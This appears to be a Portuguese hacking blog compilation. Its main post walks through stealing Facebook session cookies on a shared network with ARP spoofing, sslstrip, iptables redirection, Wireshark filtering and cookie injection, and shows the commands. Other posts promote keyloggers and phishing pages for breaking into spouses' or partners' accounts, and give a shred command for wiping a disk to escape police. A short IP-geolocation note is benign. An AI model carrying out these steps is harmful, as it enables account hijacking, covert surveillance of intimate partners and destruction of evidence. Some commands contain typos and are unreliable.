Sniffing ! Roubando cookies no wireshark.

Bom galera, muitos ai conhecem o wireshark certo? ja devem ter usado, para bisbilhotar conversas alheias e saber o que o vizinho anda acessando né? kkk mas uma coisa bem interessante seria a clonagem de cookies, para quem não sabe, é como clonar um MAC para ingressar em redes wifi, o cookie é como uma “identidade”  pos conexão, se voce entra em uma pagina web e faz logon e clica em “me mantenha conectado” o seu navegador vai salvar um cookie que nada mais é que uma prova de sua conexão, para que dá proxima vez o cookie seja lido e você não precisa digitar nada, ai entra a clonagem, assim como nas redes wifi, se você clonar o cookie alheio no seu navegador, ele passa a interagir com o servidor HTTP se identificando como o dono do cookie, assim não te exige senhas que o memso tenha usado na sessão, simples e facil. :)

a “clonagem” pode ser feita com addons de gerência de cookies como o “Advanced Cookie Manager“

Geolocalização de IP com perl.

Geolocalização de IP seria em base, informações geograficas de um determinado IP, como país, estado, cidade longitude e latitude, a geolocalização ainda não é 100% (ainda bem né kkk) devido a diversos fatores entre um ponto e outro das rotas de IP, porem pode apresentar alguns dados corretos ou aproximados

um meio que eu achei de fazer geolocalização de IP foi criando esse simples script em perl

que utiliza um API de um banco de dados ja existente, o ipinfodb.com

comando em .perl

HACKEANDO FACEBOOK COM WIRESHARK E COOKIE INJECTOR

Primeiramente você vai precisar estar na mesma rede que seu alvo. Se você não tem um alvo específico, qualquer rede pública serve.

Vamos precisar de:

Uma distro Linux para facilitar

Windows qualquer (não sei se foi o chrome ou se foi o mac mas não funcionou no mac)

SSLStrip

Wireshark

Arpspoof

Greasemonkey

Cookie injector para Greasemonkey

Firefox ou Iceweasel

Bastante coisa, não é um tuto muito fácil. Mas depois de um tempo de prática você vê que também não é tão difícil.

Primeiramente baixe tudo o que você não tem. Se você usa Back Track ou Kali, falta apenas o Greasemonkey e o Cookie Injector, com algumas buscas no google você encontra...

Vamos ao tuto então!

Primeiro de tudo temos que ativar o encaminhamento dos pacotes. Para isso basta digitar o comando abaixo:

 echo 1 > /proc/sys/net/ipv4/ip_forwarding

O próximo passo é criar uma regra no iptables para redirecionar todo o tráfego:

 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Agora sim vamos iniciar o ataque de verdade, inicie o sslstrip para ficar escutando o tráfego:

 sslstrp -a -l 8080

Agora precisamos do arp spoofing, para isso vamos usar duas vezes o comando arpspoof. Mantenha sempre as 2 abas com os 2 comandos rodando em quanto estiver capturando o tráfego:

 arpspoof -i eth0 -t ip_do_alvo ip_do_roteador

arpspoof -i eth0 -t ip_do_roteador ip_do_alvo

E por em quanto chega de terminal, vamos para a interface gráfica do wireshark. No wireshark, inicie a captura de pacotes, e para facilitar no filtro de pacotes coloque o seguinte filtro:

 http.cookie contains datr

Provavelmente você não receberá nada de início, mas assim que seu alvo acessar um site como por exemplo o Facebook veja o que acontece:

Provavelmente o último pacote GET é o que contém nosso cookie. Clique com o botão direito nele vá em Copy > Bytes > Printable Text Only:

Agora só precisamos injetar isso na página do Facebook e termos acesso ao perfil do alvo. Vá então para a página do Facebook e aperte ALT + C para abrir uma janelinha bem no meio da página. Nesta janelinha cole o que copiamos antes:

Se você ver uma mensagem como esta é porque o cookie foi injetado com sucesso, agora é só recarregar o Facebook e ver se funcionou:

E ai está! Estamos no perfil da vítima!

Algumas considerações finais:

Isto funciona não só no Facebook, praticamente todos os sites geram cookies, então praticamente todos os sites (na verdade a culpa não é do site) estão vulneráveis a esse tipo de ataque.

Se a pessoa estiver logando automaticamente porque ela marcou a caixa "Mantenha-me conectado" anteriormente pode ser que isso não funcione.

HACKEAR FACEBOOK 2016

Veja o que funciona e o que não dá certo para hackear um Facebook

Sendo um dos sites de redes sociais mais amplamente acessados, Facebook tornou-se também um lugar popular para muitos trocar mensagens secretas e gerenciar relacionamentos . Portanto, não é de admirar que muitas pessoas querem  hackear Facebook de seus entes queridos , procurando por , " facebook hacker", "como hackear facebook " ," hack facebook"  . Pode ser que você está em uma situação semelhante ou apenas quer hackear a senha de qualquer conta do Facebook, este artigo irá certamente ajudá-lo.

Todos os dias,  pessoas querem  hackear senhas do Facebook de seu esposo, amigos ,namorada ou namorado, de modo a revelar as suas relações secretas se houver. 

Possíveis formas de descobrir a senha de um Facebook :

1. Keyloggers ( ou Trojans ) - A maneira mais fácil!

Keyloggers refere-se simplesmente a gravação de todas teclas que o usuário digita no teclado de um computador específico. Isso pode ser feito usando um pequeno programa de computador chamado keylogger (ou software espião). Uma vez instalado, um keylogger irá carregar automaticamente a partir em que o computador é ligado, é executado no modo invisível e inicia a captura de todas teclas pressionadas , senhas de Facebook, e-mail ou qualquer outra conta online.

O keylogger não requer habilidades especiais de instalar e usar, é a maneira mais fácil de descobrir a senha de um Facebook. 

• Acesse no menu , a categoria KEYLOGGERS 

Extremamente fácil de usar!

Espia em tempo real , é um programa muito pequeno, instala em poucos segundos e é extremamente fácil de usar, mesmo para iniciantes.

Instalação remota

Pode ser instalado em computadores remotos. Isso torna possível para descobrir a senha do Facebook, mesmo que o usuário-alvo navegue em outro computador.

2. Phishing - O Caminho Difícil:

A outra maneira comum para obter acesso do Facebook  é através de Phishing. Este método irá fazer uso de uma página de login falsa (página web falsificado), que será exatamente semelhante a original. Digamos, por exemplo, uma página web falsificado do Facebook parece exatamente o mesmo que a do site original . Esta página é realmente criado pelo hacker e está hospedado em seu próprio servidor. Uma vez que a vítima entra com seu e-mail e senha do Facebook em tal página de login falsa, os detalhes de login são enviados ao dono da pagina fake.

Os métodos que não funcionam para hackear facebook :

Muitos sites prometem a você que ele vai descobrir e entregar a senha do Facebook após o pagamento ou completar uma pesquisa livre. NÃO FUNCIONA

Se um site pede-lhe para baixar o Facebook password hacker , ou alguma coisa do tipo, é nada mais do que um lindo vírus. NÃO FUNCIONA

Se você tem algum método que realmente funcione , ou acha que o artigo esteja errado , deixe um comentário com sua opinião

Policia Feder@l! saiba como zerar seu HD para não ser pego kkk

  Bom galera, uma coisa que muitos ‘racudão‘ ai gostaria de saber, com certeza é: “como apagar provas do meu HD” kk muita gente só formata e fica por isso mesmo, pois bem, se um dia a PF bater na sua porta, em dois passos você destroi todas as provas, a dica em questão é valida para Linux :p



Para tal feito, vamos usar o shred

-n = numero de gravações

-z = zera tudo zerado e não tem volta

~:# shred -n 4 -z /dev/sda

*Fique atento, se seu HD for IDE PRIMARY MASTER /dev/sda seraá/dev/hda

assim você está livre dos federais kkkk